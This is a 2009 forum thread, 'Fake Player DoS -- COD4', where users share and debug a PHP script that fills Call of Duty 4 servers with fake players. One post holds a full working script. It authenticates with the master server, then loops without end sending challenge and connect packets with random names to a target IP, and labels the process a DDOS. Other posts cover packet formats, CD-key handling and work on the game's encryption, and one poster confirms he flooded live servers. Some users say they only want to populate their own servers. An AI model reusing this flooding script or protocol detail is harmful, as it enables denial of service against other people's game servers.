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Post subject: Re: Fake Player DoS -- COD4 Posted: 25 Apr 2009 19:53 |
Joined: 17 Apr 2009 22:04 Posts: 8
ok how can i get the current player count
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Post subject: Re: Fake Player DoS -- COD4 Posted: 26 Apr 2009 02:46 |
Joined: 16 Aug 2007 06:25 Posts: 367
I just checked, and I don't think it's returned as a value when you query the server, but you can count the current players like so: Send the following data to the servers port with a UDP packet, shown in hex format: "ffffffff676574737461747573" Or in plain text: "....getstatus" The server will reply with a bunch of info, splitting the data into lines with linefeed hex "0a". In php, you can explode that into an array, count the array values, and then subtract 3 from the count (for the first 2 useless lines in your reply, and 1 line at the very end) to get the number of current players. This is assuming there is no other data that can be contained in the reply (which I don't think there is). In php: Code: $current_players_array = explode("\x0a", $serverreply); $current_players = count($currentplayers_array) - 3; Where $serverreply is the server's reply after you request the status.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 26 Apr 2009 14:38 |
Joined: 17 Apr 2009 22:04 Posts: 8
i also found getinfo and it is there as well just don't know how to do the code in php i can get in vb
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Post subject: Re: Fake Player DoS -- COD4 Posted: 27 Apr 2009 06:57 |
Joined: 16 Aug 2007 06:25 Posts: 367
Ah interesting, I tested getinfo but it was on an empty server. Apparently if the server is empty, the "clients" part is not returned at all. But if it's there, it shows a normal number like: "\clients\18\" Here is a php function to do the trick, just give the server's reply (after sending "....getinfo xxx") to the function and it will return the current players. It will check if the string "\clients\" exists in the reply... and if it doesn't 0 is returned since there are no clients. If it does exist, it explodes the server reply with the "\" delimiter, finds the position of "clients" in the array, and adds 1 to that position (to get the position of the actual number of clients) and returns the value. There might be an easier way to do it, but this works: Code: function getcurrentplayers($serverreply){ if(strstr($serverreply, "\\clients\\") == TRUE){ $exploded = explode("\\", $serverreply); $arraypos = array_search("clients", $exploded) + 1; return $exploded[$arraypos]; } else { return 0; } }
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Post subject: Re: Fake Player DoS -- COD4 Posted: 28 Apr 2009 23:34 |
Joined: 17 Apr 2009 22:04 Posts: 8
thanks man works like a champ now I have successfully added client to my server up to 80% of capacity and now only if i could find a way to get it to work with cod5 effectively
i have a way to make it work temporarily but its get the bdticket info thats a pain any ideas from anyone.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 29 Apr 2009 01:00 |
Joined: 16 Aug 2007 06:25 Posts: 367
Luigi wrote a tool called dwbdcrypto to explain how the bdticket field is generated ( http://aluigi.org/papers/dwbdcrypto.zip). However, you need the server's "cd-key" to be able to encrypt/decrypt the bdticket info. According to his research, this is obtained partially from the server's challenge reply, and partially from some other method (most likely the demonware servers). And I believe his research with dwbdcrypto was mainly for the demo because in patch 1.1 the idea of needing a cd-key to run a dedicated server was removed, so the method may have changed completely. From what I looked into, instead of using the server using the same "cd-key", it just uses a random key now for the latest patch. I came to this idea because the "chunk" of the cd-key given with the challenge was different each time I rebooted my own server. Luigi and I had a discussion about some of this over private messages, and a little bit here: demonware-help-questions-t811.htmlIn the end, he wrote a tool to help with decrypting the data sent by the demonware server. I tried playing around and getting it to work so I could see where this other "chunk" of the server's cd-key was coming from to maybe generate the bdticket string, but the whole idea became too much work for me I decided to give up trying. However, feel free to keep researching and trying. If you can get a solid method of generating the bdticket info that would be very cool. Overall, if you can find a way to get the server's full "cd-key" you could probably generate the correct bdticket string using dwbdcrypto. But demonware's encryption and obfuscation makes it a pain.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 29 Apr 2009 03:43 |
Joined: 17 Apr 2009 22:04 Posts: 8
using commview i watched all the packets that went out and there are a number of them generated when you do a connect to a server on the xbox port(3074) the only thing is commview doesn't show the text for it or it is encrypted or in another process.
I am sure this is where the data is transmitted for the bdticket just don't know how to obtain it.
I did find that no message to the master server is necessary to connect.
Any ideas.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 29 Apr 2009 08:39 |
Joined: 16 Aug 2007 06:25 Posts: 367
Yea that's the demonware server, and it's probably the information needed to generate the final bdticket string. If you connect to a server, you will notice the following happens: 1) Client requests challenge from server. 2) Server replies with challenge and the extra string (first 8 bytes of the server's cd-key hash in base64) 3) Client connects to cod5-pc.auth.mmp3.demonware.net:3074, encrypted data is exchanged between the 2 hosts. Probably the rest of the server's cd-key.. and maybe other data. 4) AFTER the connection for #3 is closed by the demonware server, the client finishes connecting to the game server by sending the connect packet (with the correctly computed bdticket string, since it now has the full key). As for the base64 string given to you in #2, you should be able to use it to get the partial tiger192 cd-key hash of the server like so: bin2hex(base64_decode("mV+fwRx2uJc=")); The result of that would be 995f9fc11c76b897 which is the first 8 bytes of the server's 24 byte tiger192 hash. So in the end, your encryption key that you would give to Luigi's dwbdcrypto tool would look like: 995f9fc11c76b897???????????????????????????????? As far as getting the ??? from the demonware server, that is what Luigi and I were trying to figure out. In the end, he released a tool here ( demonware-help-questions-t811.html), but that will only decrypt data from demonware servers. He also noted that since the protocol "packs a lot of the data in bitstrings", so nothing will be readable just by using that tool. This is where I decided it was too much work (encryption/decryption, bitstrings, etc...) and decided to stop working on it. But if you or Luigi want to continue on and look for a concrete method of encrypting/decrypting data from the demonware servers, that would be cool. But it's a little too much for my knowledge at the moment :(
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Post subject: Re: Fake Player DoS -- COD4 Posted: 29 Apr 2009 19:32 |
Joined: 29 Apr 2009 19:30 Posts: 11
I've rewritten the script, I just don't know why you guys say it works, every server that I try keeps "cccccccc" spamming me. This is the code I've been rewriting: Code: <?php
// If the parameters where not 3 echo and return if(count($_SERVER["argv"]) != 4) { echo "You did not fill in all required arguments. Please use the format: <FILENAME> <SERVERIP> <SERVERPORT> <CRACKED TRUE/FALSE> \n"; return; } // Put all the parameters in variables $targetServerIP = $argv[1]; $targetServerPort = $argv[2]; switch($argv[3]) { case "true": $crackedBoolean = true; break; case "false": $crackedBoolean = false; break; default: $crackedBoolean = false; break; } // Client information $clientGuid = "MYGUID"; $clientKey = substr("MYSERIALKEY", 0, 16); // This information is needed to communicate with the target server $masterServerString = "\xff\xff\xff\xffgetKeyAuthorize 0 ".$clientKey." PB ".$clientGuid; $targetServerstring = "\xff\xff\xff\xff" . 'getchallenge 0 "' . $clientGuid . '"'; // This function handles the random name picking function generateName() { $arrNames = array( "fly", "??pium", "[11]glyhigh'", "55th|supah", "pandemic prank`", "esuba' Lucker", "skill>l33t", ":P'Owner:", "BB|goliot", "aG.L4stknight", "revol<3", "[vg]Frst", "cr33p inct'v", "=TFF=MinuteMan", "shox", "Bodyguard#", "phnyyyyyyyyyyyy", "Local", "(LZ) Tr3n", "eZ0o_", "Interc3pt0r", "[K9] EnV0ltA", "LoL.mp", "eMuda.Mandar1ni", "Jo!Ntzz", "Death Magnet1c", "St1flersMum", "Virtue.Drush", "Kqp", "<-Low", "h4ns", "Pown-D.D&B", "Kr0ketje1.", "scrappycoco", "-=SnF=-STIN", "Accce", "element0", "|IF|Kebe", "|IF|SadiC", "#MHB::Sho0ter", "#MHB::Urwan", "(-GPS-)Own3d", "[C.SF.]boreas", "SOLO", "Berta incazz0so", "cabutssss", "daro", "[SdF] GhOsT!", "MA3EH_HEPE", "Moron", "McLovin", "=OSM=Amantis", "BrotherS|KAM!L3", "*R!P* ZDRAWEX", "^6???", "WdC|.Vig", "z0h4n", "mordshase", "m0u", "Wac Emigration", "BrotherS|NuK3", "DoggyFashion", "[SWL]MadToni", "[KUR!] Walkuere", "Lisa :)", "]PBC[ Pvt.Paula", "[k0|LeckSieKon]", "[DFF]D4rk", "WdC|.Myros", "Alam", "<cH0p Ch0P>", "FG' SoNNy", "Lucker.Pro <3", "Where", "=TCFF=MinuteMan", "GL-MAFIA", "ubojica", "thoMPson", "NAPUSENA KAMILA", "|AFK|bidzy", "d2T.TurboHIGH", "{silk}AxE", "Ruzno pace", "exor", "[1oolac] haTa*", "b4rr4", "=TCFF=^"); srand((double)microtime() * 10000000); $name = array_rand($arrNames, 1); $aRandomSelection = $arrNames[$name]; return $aRandomSelection; } if($crackedBoolean == true) { echo "You seem to have entered a cracked server. Skipping master server socket.\n"; } else if ($crackedBoolean == false) { echo "This seems not te be a cracked server. Opening socket to CoD4 Master Server.\n"; // Open up a socket to master server $socketToMasterServer = fsockopen("udp://cod4master.activision.com", "20800") or die ("ERROR: Could not open socket to master server!"); echo "Success! Connected to CoD4 Master Server.\n"; echo "Sending KEY and GUID to master server\n"; // Write the masterServerString to the master server socket fwrite($socketToMasterServer, $masterServerString);
echo "KEY and GUID sended to master server\n"; echo "Now starting to DDOS\n"; }
// Infinite loop while(0 == 0) { // Generate a name for our player $playerName = generateName(); echo "Now adding player: ".$playername."\n"; // Create a socket to the target server $socketToTargetServer = fsockopen("udp://" . $targetServerIP, $targetServerPort) or die ("ERROR: Could not open socket to target server!"); // Write our autentication string to the target server fwrite($socketToTargetServer, $targetServerstring); // Write a timeout to protect our CPU stream_set_timeout($socketToTargetServer, 1); // Fetch our response from the server $targetServerResponse = "".fread($socketToTargetServer, 1400); $targetServerInfo = stream_get_meta_data($socketToTargetServer); if($targetServerInfo["timed_out"]) { echo "ERROR: Server connection timed out.\n"; } else { if(substr($targetServerResponse, 0, 21) != "\xff\xff\xff\xffchallengeResponse") { if($targetServerResponse == "\xff\xff\xff\xffneedcdkey" && $crackedBoolean == false) { fwrite($socketToMasterServer, $masterServerString); echo "ERROR: Server requires a working CD-KEY\n"; } else { if($targetServerResponse == "\xff\xff\xff\xfferror\x0aEXE_ERR_CDKEY_IN_USE") { echo "ERROR: CD-KEY is already in use.\n"; } else { echo "ERROR: Unknown error. Related to CD-KEY / GUID.\n"; } } } else { // We need to fetch this string, which contains an encrypted key // So the server knows it succeeded checking guide/cd-key etc $challengeRespone = substr($targetServerResponse, 22, 20); // This string is the actual data of the connection packet(s) $connectString = ("\xff\xff\xff\xff" . 'connect " \\cg_predictItems\\1\\ cl_anonymous\\0\\ cl_punkbuster\\1\\ cl_voice\\1\\ cl_wwwDownload\\1\\ rate\\25000\\ snaps\\20\\ name\\' . $playerName . '\\ protocol\\6\\ challenge\\' . $challengeRespone . ' \\qport\\' . rand(10000, 65534) . '"'); // Execute the query on the target server socket fwrite($socketToTargetServer, $connectString); // Lets read the final receiving response of our target server $targetServerFinalResponse = ''.fread($socketToTargetServer, 1400); // And handle it if it was not succeeded if($targetServerFinalResponse != "\xff\xff\xff\xffconnectResponse\x20") { if($targetServerFinalResponse == "\xff\xff\xff\xfferror\x0aEXE_SERVERISFULL") { echo "ERROR: Server was full.\n"; } else { echo "ERROR: Unknown error. Related to adding a new player.\n"; } } else { echo "PLAYER: ".$playername." has been added to the target server.\n"; } } } } ?>
Feel free to use it, just give credits. Please help me with the problem I'm having and see if you can find any bugs.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 29 Apr 2009 20:39 |
Joined: 16 Aug 2007 06:25 Posts: 367
mikevercoelen, are you getting the same player "cccccccc" being spammed in a server with my code, or your code? I was a little confused there. Last I tested, my code was OK. But it's been a while since I've really played with it. It might have something to do with the random players... so you may want to try your function that picks the player randomly from an array.
I remember doing some additional testing, and there are many more replies after requesting a challenge/sending the connect string that should be expected. I'll try to round those up and re-write it, but let me know if you have a problem with my code or yours.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 30 Apr 2009 00:22 |
Joined: 17 Apr 2009 22:04 Posts: 8
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Post subject: Re: Fake Player DoS -- COD4 Posted: 30 Apr 2009 09:38 |
Joined: 16 Aug 2007 06:25 Posts: 367
I just tested the same script from my first post (though I used my exact GUID instead of calculating it for simplicity), and I was still able to flood a server just fine. I'm not sure where you guys are running into problems, you will need to do some packet scans and see what the game server is reporting... or check what letter the script is reporting since they all have their own meaning. As for additional server replies that I didn't originally include in the script: http://pastebin.com/f248dd268. You will have to work these replies into your scripts if you want to track them...as I'm a bit lazy at the moment to re-write my original script :P ..but it shouldn't be too hard. Those can be expected after you send the connect packet, though most are rare for the typical CoD4 server. They mainly handle things like a server needing a password, ping too high, server runs a mod, different version, etc. Also, there may be additional server responses, but that's all I was able to find. I have tested thousands of live servers with connect packets... so that should be most of the ones you'd expect.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 30 Apr 2009 14:32 |
Joined: 29 Apr 2009 19:30 Posts: 11
Ok dude, cheers
My name generation script does work tell me what you have changed Ill look at it. SomaFM can you please explain in detail how it works,
This is what I think:
2 sockets, one to master one to target server
.. what then?
BTW please work at your coding style it hurts my eyez
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Post subject: Re: Fake Player DoS -- COD4 Posted: 30 Apr 2009 14:34 |
Joined: 29 Apr 2009 19:30 Posts: 11
And how exacly can I obtain the stats from a server like X amount of players are playing now,
I did a packet scan with my packet sniffer and I got a hex that contained (ASCI) ?????GetSTatus
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Post subject: Re: Fake Player DoS -- COD4 Posted: 30 Apr 2009 14:40 |
Joined: 29 Apr 2009 19:30 Posts: 11
$clientGuid = "MYGUID"; $clientKey = substr("MYSERIALKEY", 0, 16);
is this the correct sequence?
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Post subject: Re: Fake Player DoS -- COD4 Posted: 30 Apr 2009 15:29 |
Joined: 16 Aug 2007 06:25 Posts: 367
Make use of the edit feature :P. No need to reply 3 times in 8 minutes. Also, you should paste my code into notepad++ and save it as a .php file, might make it easier to read. But basically, you have to send $masterstring to the MASTER server (owned by activision) one time, then you should be good. The master server appears to never reply to this packet, but if it doesn't receive this single UDP packet, the GAME server will keep replying with "\xff\xff\xff\xffneedcdkey" so you must send it first... just 1 time. After sending it, if needed, it will be sent again. That is where "n" is echoed --> the script got "needcdkey" from the GAME server, so it send the $masterstring to the MASTER server again. This can happen occasionally, and I don't know how often you need to do it. Your other udp socket is directly to the GAME server. mikevercoelen wrote: And how exacly can I obtain the stats from a server like X amount of players are playing now, Send "\xff\xff\xff\xffgetstatus" or "\xff\xff\xff\xffgetinfo xxx" to the game server, and parse the data it replies. I already posted 2 ways on doing this before. getstatus is more detailed info (actual player list, server variables, etc). getinfo is more generic and contains less data (basic info you get from each server in a master server list query). mikevercoelen wrote: is this the correct sequence? That is fine. Just make sure your guid is correct and your client key is in all uppercase, and without dashes. You can use the first 16 or the full key, shouldn't matter. One note about your master server socket ($socketToMasterServer) -- UDP is a connectionless protocol without error checking or acknowledgments, so you will probably never see an error there (unless you didn't have an IP address or something weird). Your code will still work, but it's probably more work than is needed. UDP just sends data to a host and doesn't care about ordering, replies, etc.. it relies mostly on the programmer to implement some kind of error checking/handling if so desired.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 30 Apr 2009 21:51 |
Joined: 29 Apr 2009 19:30 Posts: 11
I know.
TCP checks if the packet arrives, UDP doesn't.
but can you tell me how it works with SERIAL/CD-KEY, does it get send to master server? and it gets back parsed with guid? I don't understand it.
Also I've been debugging these on ubuntu, I don't know if that matters do you know?
Also sorry for my 3 reply's edit features was bugged ;)
Thanks for help dude,
If you ever need help in C++/C/PHP just call me,
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Post subject: Re: Fake Player DoS -- COD4 Posted: 30 Apr 2009 22:35 |
Joined: 17 Apr 2009 22:04 Posts: 8
I got it to work i found the issue it was a case sensitivity issue.
Thanks for the random names part appreciate it. Maybe you have an idea about the encryption for demonware?
as far as the cd-key goes to the master server there is no reply from that server. just the game server it self. If you have access to your cd-key you can build the GUID from that or do a packet sniff and get it that way. It won't affect your ability to play unless you get banned from a server for using the script. I am not using this as a denial of service just a populating script. Which as of now I am working on re-writing to VB and accessing it that way so I am trying to do a little more with it.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 04 May 2009 21:05 |
Joined: 04 May 2009 21:01 Posts: 2
Is this possible to be created on a Windows XP O.S???
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Post subject: Re: Fake Player DoS -- COD4 Posted: 04 May 2009 21:15 |
Joined: 16 Aug 2007 06:25 Posts: 367
TriFire wrote: Is this possible to be created on a Windows XP O.S??? PHP can be run from the CLI on windows xp, so yes.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 05 May 2009 17:39 |
Joined: 29 Apr 2009 20:42 Posts: 8
Hello, i hope you can help me. I read the full topic and i have some questions about the script. I want to emulate 5-10 fake players which fills my gameserver a bit. They have to disconnect every minute or so. Does this script works on cod4 and cod5? Do I get problems with ISP or something?
thx 4 all help!
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Post subject: Re: Fake Player DoS -- COD4 Posted: 05 May 2009 17:53 |
Joined: 04 May 2009 21:01 Posts: 2
Quote: Hello, i hope you can help me. I read the full topic and i have some questions about the script. I want to emulate 5-10 fake players which fills my gameserver a bit. They have to disconnect every minute or so. Does this script works on cod4 and cod5? Do I get problems with ISP or something?
thx 4 all help! I was hoping to do this as well but i dont have any programing knowlege of how to do this, Maybe SomaFM could make a small step tutorial of now to get this program going on a Windows OS if thats ok with u Soma :) Maybe somthing basic.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 05 May 2009 20:28 |
Joined: 16 Aug 2007 06:25 Posts: 367
It's more of an example to say "yea, it's possible to have fake players". You guys will have to put more work into it to make it do the things you wish. Buggy, this script only works on CoD4. See my post here about using an if statement to control the number of players: fake-player-dos-cod4-t454.html#p5104. The fake players time out after a certain time (not sure exactly when, the server decides that), but it's never longer than a minute from what I've seen. You won't get any problems with your ISP (unless they are Nazis). It's just normal UDP traffic. TriFire: fake-player-dos-cod4-t454.html#p3401
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Post subject: Re: Fake Player DoS -- COD4 Posted: 06 May 2009 11:29 |
Joined: 29 Apr 2009 19:30 Posts: 11
I'm about to rewrite his script with a password function, and also a function to check if the target server is cracked (so no need to socket to cod4 master server)
Also I can write the like if 4 players are playing stop nuking players, etc So it looks like your server is active.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 06 May 2009 11:38 |
Joined: 29 Apr 2009 19:30 Posts: 11
Soma, got xfire or MSN so I can add you?
just PM me, I have a question maybe there is a packet which contains like DISCONNECTCLIENT If we could send such info we can control it just perfect, which packet sniffer you use Wireshark?
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Post subject: Re: Fake Player DoS -- COD4 Posted: 06 May 2009 14:26 |
Joined: 16 Aug 2007 06:25 Posts: 367
I am not a big fan of instant messaging programs. I looked, but was not able to find any clear text "disconnect" like packets when I disconnected from a server. It's probably not as simple as that, but I wouldn't know for sure as I don't know the protocol. There's probably encoding/compression/etc.. being used in the traffic. And yes, I use Wireshark.
As far as using this to keep a server populated: it's possible with a bit more work. For example, using static player names that you know are fake, and making sure they stay connected until a "real" player connects (then take 1 out) But as I said, this is mainly an example. You will probably be better off with a 3rd party mod, or something more "official" to generate fake players.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 06 May 2009 14:53 |
Joined: 29 Apr 2009 20:42 Posts: 8
Quote: As far as using this to keep a server populated: it's possible with a bit more work. For example, using static player names that you know are fake, and making sure they stay connected until a "real" player connects (then take 1 out) But as I said, this is mainly an example. You will probably be better off with a 3rd party mod, or something more "official" to generate fake players.
Exactly that is what i want. Who is able to wirte such script??
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Post subject: Re: Fake Player DoS -- COD4 Posted: 06 May 2009 15:40 |
Joined: 29 Apr 2009 19:30 Posts: 11
Last edited by mikevercoelen on 06 May 2009 18:31, edited 1 time in total.
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Post subject: Re: Fake Player DoS -- COD4 Posted: 06 May 2009 16:16 |
Joined: 29 Apr 2009 19:30 Posts: 11
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Post subject: Re: Fake Player DoS -- COD4 Posted: 06 May 2009 21:37 |
Joined: 29 Apr 2009 20:42 Posts: 8
Whats the problem mikevercoelen?
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